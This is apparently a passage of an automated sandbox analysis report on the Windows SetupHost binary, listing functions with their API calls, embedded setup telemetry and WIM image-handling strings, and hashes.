                                                                                                                                                                                                                  • Part of subcall function 00A0EA70: AcquireSRWLockExclusive.KERNEL32(00A13DA0,0098FEE0,?,009B7383,00A16F48,00000000,?,?), ref: 00A0EA7C
                                                                                                                                                                                                                  • Part of subcall function 00A0EA70: ReleaseSRWLockExclusive.KERNEL32(00A13DA0,?,009B7383,00A16F48,00000000,?,?), ref: 00A0EAAF
                                                                                                                                                                                                                  • Part of subcall function 00A0EA70: WakeAllConditionVariable.KERNEL32(00A13DA4,?,009B7383,00A16F48,00000000,?,?), ref: 00A0EABA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake__aulldiv
                                                                                                                                                                                                                • String ID: hr = [0x%X]$ActivationBlockSkipped$ActivationBlocked$ActivationGatherOSStateExitCode$AdvertiseTime$CompatActionableScanTime$CompatBlockEncountered$CompatBlockedCategories$CompatFinalizeScanTime$CompatHardBlockedProviders$CompatInstallReqTime$CompatLayer$CompatMigScanTime$CompatPollingTime$CompatRecoveryReqTime$CompatSysGatedTime$CompatSysReqScanTime$ComplianceProviderBlockMessageIds$CustomRunErrorExitCode$CustomRunErrorGUID$CustomRunTimeout$CustomRunTotalTime$DUImageDownloadedDrivers$DUImageOptIn$DUImageSkippedDrivers$DUImageTime$DUImageTotalDrivers$DUSetupOptIn$DUSetupTime$DataMigrationTime$DebuggerOptionsTime$DecryptTime$DefaultPKeyUsed$DigitalPKeyCmdUsed$DiskPartitionTime$DiskSpaceDownloadReqBlocked$DiskSpaceDownloadReqExtDriveUsed$DiskSpaceDownloadReqFUReservesClaimedSpace$DiskSpaceDownloadReqFUReservesTotalSpace$DiskSpaceDownloadReqFixedDriveAutoSelected$DiskSpaceInstallReqBlocked$DiskSpaceInstallReqExtDriveUsed$DiskSpaceInstallReqFUReservesClaimedSpace$DiskSpaceInstallReqFUReservesTotalSpace$DiskSpaceInstallReqFixedDriveAutoSelected$DownloadReqCleanupTaskTime$DownloadReqExtDriveReqSatisfied$DownloadReqFreeUpSpaceButtonClicked$DownloadReqLearnMoreLinkClicked$DownloadReqOpenDownloadsClicked$DownloadReqOpenRecycleBinClicked$DownloadReqStorageCleanupTime$DownloadReqSysDriveReqSatisfied$DownloadReqToggledtoExtStorageFlow$DriverMigrationTime$EulaTime$ExtDriveDownloadReqFreeSpace$ExtDriveDownloadReqRequiredSpace$ExtDriveInstallReqFreeSpace$ExtDriveInstallReqRequiredSpace$GetDirHardReserveStatusFailureOnSrcs$HostOsArchitecture$HostOsBranchName$HostOsBuildNumber$HostOsCompact$HostOsEditionId$HostOsEditionType$HostOsInstallationType$HostOsLanguage$HostOsMajorVersion$HostOsMinorVersion$HostOsProductType$HostOsSkuId$HostOsSkuName$HostOsStageType$HostOsSuiteMask$HostOsWimBoot$ImageDeployTime$InstallModeFinalizeSkipped$InstallReqCleanupTaskTime$InstallReqExtDriveReqSatisfied$InstallReqFreeUpSpaceButtonClicked$InstallReqLearnMoreLinkClicked$InstallReqOpenDownloadsClicked$InstallReqOpenRecycleBinClicked$InstallReqStorageCleanupTime$InstallReqSysDriveReqSatisfied$InstallReqToggledtoExtStorageFlow$IsWebSetupCreatedMedia$LayoutISOTime$LayoutUSBTime$LegacySetupInterrupt$MediaLayoutTime$MigratePackageRemovedFODRetrievalCount$MigratePackageRemovedFODRetrievalStatus$MultiLayoutTime$NativeProcessorArchitecture$NewSetupMigChoice$NewSetupMigChoicesOffered$OSPartitionDownloadReqFreeSpace$OSPartitionDownloadReqFreeSpaceAfterResponse$OSPartitionDownloadReqFreeSpaceBeforeSilentCleanup$OSPartitionDownloadReqMinimumRequiredSpace$OSPartitionDownloadReqRequiredSpace$OSPartitionDownloadReqSpaceFreedByCleanupTask$OSPartitionDownloadReqSpaceFreedByStorageCleanup$OSPartitionDownloadReqTotalSpace$OSPartitionInstallDiskSpaceReqWithoutReservesInfo$OSPartitionInstallReqFreeSpace$OSPartitionInstallReqFreeSpaceAfterResponse$OSPartitionInstallReqFreeSpaceBeforeSilentCleanup$OSPartitionInstallReqFreeSpacePostUpgrade$OSPartitionInstallReqMinimumRequiredSpace$OSPartitionInstallReqRequiredSpace$OSPartitionInstallReqSpaceFreedByCleanupTask$OSPartitionInstallReqSpaceFreedByStorageCleanup$OSPartitionInstallReqTotalSpace$PKeyDownlevelInstallChannel$PKeyGatherOSStateExitCode$PKeyINeedAPkeyClicked$PKeyLocationFound$PKeyLocationsTried$PKeySkipButtonClicked$PKeyValidateTime$PerformMediaUpdate$PostRollbackContext$ProductKeyEditionId$ReflectDrivers$SecureBootCheckFailure$Setup360Mode$Setup360Scenario$SetupFailureCount$SetupMediaDriveType$SetupPriority$SetupStartTime$SetupUpgradeAttempts$SourceOsBuildNumber$SourceOsBuildQFE$SourceOsEditionId$SourceOsLanguage$SourceOsMajorVersion$SourceOsMinorVersion$SourcesFolderTaggedAsHardReserve$SummaryTime$SystemPartitionFreeSpace$SystemPartitionFreeSpaceWinRe$SystemPartitionTotalSpace$TargetOsAllowPartitionChanges$TargetOsAllowUninstall$TargetOsArchitecture$TargetOsCompact$TargetOsDisableNEO$TargetOsEditionId$TargetOsImageIndex$TargetOsInstallationType$TargetOsLanguage$TargetOsServicePackBuildNumber$TargetOsServicePackLevel$TargetOsVersionBuildNumber$TargetOsVersionMajor$TargetOsVersionMinor$TestId$UninstallComment$UninstallReason$UpdateMediaDownloadResult$UpdateMediaNotSupported$UpdateMediaOptInDefaultValue$UpdateMediaSkipButtonClicked$UpdateMediaUIShown$UpgLayoutTime$WebSetupClientVersion$WebSetupDownloadTotalTime$WebSetupImageDefaultsCheckboxChecked$WebSetupInputDefaultArch$WebSetupInputDefaultEdition$WebSetupInputDefaultLang$WebSetupInputMediaType$WebSetupInputSelectedArch$WebSetupInputSelectedEdition$WebSetupInputSelectedLang$WebSetupInputUpgradeNow$WebSetupInstanceId$WebSetupOnlineStoreVersion$WebSetupTransport$WimLayoutTime$WindowsLicenseState$WuId
                                                                                                                                                                                                                • API String ID: 1718760079-828019143
                                                                                                                                                                                                                • Opcode ID: e0079055030783200f5d27e5d949cc20c36a69db6673849183f38238dcd80584
                                                                                                                                                                                                                • Instruction ID: d04bf2db82a2e78152d0c441cc40ecc30db25e1f3de5432e19c82951ae1569c0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0079055030783200f5d27e5d949cc20c36a69db6673849183f38238dcd80584
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B336DB1D05F10CFD356DFA9F9442C63AE2BB8E354B55C12AA8189F360E3F649468F84
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,00000010,00000000,009DE028,00000000), ref: 009DF9D0
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000010,00000000,009DE028,00000000), ref: 009DF9D7
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009DFBB4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000001), ref: 009DFBC7
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009DFBCE
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 009DFDB0
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009DFDB7
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009DFDF4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 009DFE00
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009DFE07
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009DFE49
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009DFE54
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009DFE5B
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009DFF41
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009DFF4C
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009E0036
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000004), ref: 009E0041
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E0048
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?,00000004), ref: 009E00C1
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000004), ref: 009E00D9
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009DFF53
                                                                                                                                                                                                                  • Part of subcall function 009C1291: GetProcessHeap.KERNEL32(00000000,?,?,009C1350,?,?,?,009B7743,23FAFFD7,?,?,?,?,00A10C02,000000FF), ref: 009C12A5
                                                                                                                                                                                                                  • Part of subcall function 009C1291: HeapFree.KERNEL32(00000000), ref: 009C12AC
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,00000000,009DE028,00000000), ref: 009E023B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Free$Process$ErrorLast$Alloc
                                                                                                                                                                                                                • String ID: IMAGE$WIM$WIM\IMAGE[*]
                                                                                                                                                                                                                • API String ID: 2243891835-1500226373
                                                                                                                                                                                                                • Opcode ID: 7e848921e6d0f02cd5c833c04bcd61d3b5a556f7179f5e7a9e034507d926cd3f
                                                                                                                                                                                                                • Instruction ID: 11e980b05d15f4987d992119bf7fb08d8ac5f37fe8bf99ac3434783b508ba6aa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e848921e6d0f02cd5c833c04bcd61d3b5a556f7179f5e7a9e034507d926cd3f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4042DD32A483528BC721DF65C891B2AB7E9AFC8750F04893EF9469B351D734DC05CBA2
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 009ED8D1
                                                                                                                                                                                                                • SetLastError.KERNEL32(0000000D,?,00000000,?), ref: 009ED927
                                                                                                                                                                                                                • SetLastError.KERNEL32(000000EA,?,00000000,?), ref: 009ED93F
                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009ED9A1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000004,?,00000000,?,00000000,?,00000000,?), ref: 009EDAE2
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,?), ref: 009EDAE9
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?), ref: 009EDAFF
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?), ref: 009EDE36
                                                                                                                                                                                                                • memset.MSVCRT ref: 009EDE87
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: GetLastError.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB6D8
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: GetCurrentThreadId.KERNEL32(?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB6EC
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: RtlAcquireResourceShared.NTDLL ref: 009EB6FC
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: RtlReleaseResource.NTDLL(00A16750), ref: 009EB728
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: SetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB766
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB773
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: HeapFree.KERNEL32(00000000), ref: 009EB77A
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009EDF96
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009EDFA4
                                                                                                                                                                                                                • memset.MSVCRT ref: 009EE07B
                                                                                                                                                                                                                • memset.MSVCRT ref: 009EE234
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,00000000,?,00000000,?), ref: 009EE383
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,00000000,?,00000000,?), ref: 009EE3A3
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009EE3AA
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000,?,00000000,?,00000000,?), ref: 009EE3B5
                                                                                                                                                                                                                  • Part of subcall function 009DCBE0: GetEnvironmentVariableW.KERNEL32(WIM_Verbose_Logging,00000000,00000010,?,?,?,?,?,?,009DE5B8), ref: 009DCC32
                                                                                                                                                                                                                  • Part of subcall function 009DCBE0: swscanf_s.MSVCRT ref: 009DCC51
                                                                                                                                                                                                                  • Part of subcall function 009DCBE0: RtlNtStatusToDosError.NTDLL ref: 009DCCE4
                                                                                                                                                                                                                  • Part of subcall function 009DCBE0: RtlNtStatusToDosError.NTDLL ref: 009DCCF2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$Last$Heap$Statusmemset$Process$FreeResource$AcquireAllocCurrentEnvironmentReleaseSharedThreadUnothrow_t@std@@@Variable__ehfuncinfo$??2@swscanf_s
                                                                                                                                                                                                                • String ID: Failed to get img buf$Integer overflow after ReadData$Integer overflow after WriteData$ReadData failed$UncompressFileBase$WriteData failed$WriteData failed during NULL block copy$file corrupted in block at offset %p$fmalloc failed
                                                                                                                                                                                                                • API String ID: 2818326917-3155456616
                                                                                                                                                                                                                • Opcode ID: 18a764149881a02ecceff4e3196ca7ec74036af98b11a442c6e4ef5d5c4ed025
                                                                                                                                                                                                                • Instruction ID: 5c87ef5a2c21b95db6422fcc026d7ef94a7812618fe7ee62acfa5277e2dc498a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18a764149881a02ecceff4e3196ca7ec74036af98b11a442c6e4ef5d5c4ed025
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD724AB1E012699FCB65CF59CC84B9EB7B9BB88310F1445EAE60DA7241D7709E80CF58
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BF934: towupper.MSVCRT ref: 009BF988
                                                                                                                                                                                                                  • Part of subcall function 009BF934: towupper.MSVCRT ref: 009BF999
                                                                                                                                                                                                                • RtlDosPathNameToNtPathName_U.NTDLL ref: 009EB186
                                                                                                                                                                                                                • NtCreateFile.NTDLL ref: 009EB1DC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000028), ref: 009EB1ED
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009EB1F4
                                                                                                                                                                                                                • NtQueryInformationFile.NTDLL ref: 009EB208
                                                                                                                                                                                                                • wcsncmp.MSVCRT(00000000,00000004,-00000002), ref: 009EB22C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009EB23F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009EB246
                                                                                                                                                                                                                • NtClose.NTDLL ref: 009EB24F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009EB262
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009EB269
                                                                                                                                                                                                                • NtClose.NTDLL ref: 009EB272
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,00000000,009E3E82,?,?,?,?,?,?,00000001,?,00000000), ref: 009EB2A4
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00000001,?,00000000), ref: 009EB2AB
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00000001,?,00000000), ref: 009EB2B9
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00000001,?,00000000), ref: 009EB2CF
                                                                                                                                                                                                                • NtSetInformationFile.NTDLL ref: 009EB320
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000001,?,00000000), ref: 009EB335
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009EB33C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FileFree$AllocCloseErrorInformationLastPathtowupper$CreateNameName_Querywcsncmp
                                                                                                                                                                                                                • String ID: @$WIMSetFileShortName$\Program Files\WindowsApps\$\Windows\WinSxS\
                                                                                                                                                                                                                • API String ID: 2294239984-2754016081
                                                                                                                                                                                                                • Opcode ID: 5cea804a714995ba93db11c2dca2fddb1f038a59644de06dbcd16059c6bad8eb
                                                                                                                                                                                                                • Instruction ID: 7d16a1ac6a98a17c7c2b2ca77cd6a5457d152589d25bd77ab5fe28848d60b039
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cea804a714995ba93db11c2dca2fddb1f038a59644de06dbcd16059c6bad8eb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B71D171A04255ABDB12DFA6CC49BFF7BBDAF54750F148029EA15EB250EB30CD018BA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BF8C5: _wcsicmp.MSVCRT ref: 009BF912
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,?,?), ref: 009C3932
                                                                                                                                                                                                                • wcschr.MSVCRT ref: 009C39AD
                                                                                                                                                                                                                • wcschr.MSVCRT ref: 009C39BB
                                                                                                                                                                                                                • wcschr.MSVCRT ref: 009C39DB
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,00000001), ref: 009C3A31
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,?), ref: 009C3A6A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,?), ref: 009C3A8A
                                                                                                                                                                                                                • wcschr.MSVCRT ref: 009C3ABE
                                                                                                                                                                                                                • wcschr.MSVCRT ref: 009C3AEF
                                                                                                                                                                                                                • wcschr.MSVCRT ref: 009C3B0D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,?), ref: 009C3B68
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,?), ref: 009C3BE9
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 009C3CBC
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009C3D14
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,00000002), ref: 009C3DAD
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009C3DDE
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,00000002,?,?,?,?,?,?,?), ref: 009C3EA7
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009C3EFD
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009C3F4B
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009C3F86
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Alloc$wcschr$Free$_wcsicmp
                                                                                                                                                                                                                • String ID: [*]
                                                                                                                                                                                                                • API String ID: 3095872602-3843684642
                                                                                                                                                                                                                • Opcode ID: 318419d69cba33575959615cb428efd54e298bf70df08117b53dfe824c2f2278
                                                                                                                                                                                                                • Instruction ID: 68d4eddf0aa4154ab3bbeb7b1e6817cbf5160a4a161f8ca33f719c06030f062b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 318419d69cba33575959615cb428efd54e298bf70df08117b53dfe824c2f2278
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84325A35A083429FD714DF68C880B2AB7FAABC8750F54C92DF98687351DA71ED41CB52
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,009DF26B), ref: 009DE8D2
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009DE8D9
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009DE993
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000000,?,?,?,00000000,00000000), ref: 009DE9A1
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009DE9A8
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009DE9ED
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 009DE9F9
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009DEA00
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 009DEA72
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009DEA79
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009DEAB4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000), ref: 009DEAC0
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009DEAC7
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009DEB07
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 009DEB11
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009DEB18
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,009DF26B,00000000), ref: 009DEB58
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Free$Process$ErrorLast
                                                                                                                                                                                                                • String ID: INDEX$WIM\IMAGE[*]
                                                                                                                                                                                                                • API String ID: 2707565571-3437101994
                                                                                                                                                                                                                • Opcode ID: e630f39e8b2fb133a649068e35d106092393e179b82590ea55445a04d2cc7f4e
                                                                                                                                                                                                                • Instruction ID: 529191a75e75bebda0ae9299f88fceeeb04ce57d6c498302fad1a3371eb4ae83
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e630f39e8b2fb133a649068e35d106092393e179b82590ea55445a04d2cc7f4e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7B19335E402199FDB21EBA9C944AAEB7B9BF84710F19C56AE806EF350D734DD01CB90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BF8C5: _wcsicmp.MSVCRT ref: 009BF912
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,?), ref: 009C2C15
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009C2CC7
                                                                                                                                                                                                                • wcschr.MSVCRT ref: 009C2D19
                                                                                                                                                                                                                • wcschr.MSVCRT ref: 009C2D27
                                                                                                                                                                                                                • wcschr.MSVCRT ref: 009C2D48
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,00000001), ref: 009C2D9E
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,?), ref: 009C2DD4
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,?), ref: 009C2DF9
                                                                                                                                                                                                                • wcschr.MSVCRT ref: 009C2E28
                                                                                                                                                                                                                • wcschr.MSVCRT ref: 009C2E56
                                                                                                                                                                                                                • wcschr.MSVCRT ref: 009C2E74
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 009C2ECA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,?), ref: 009C2F42
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 009C2FF0
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009C3048
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009C30DA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
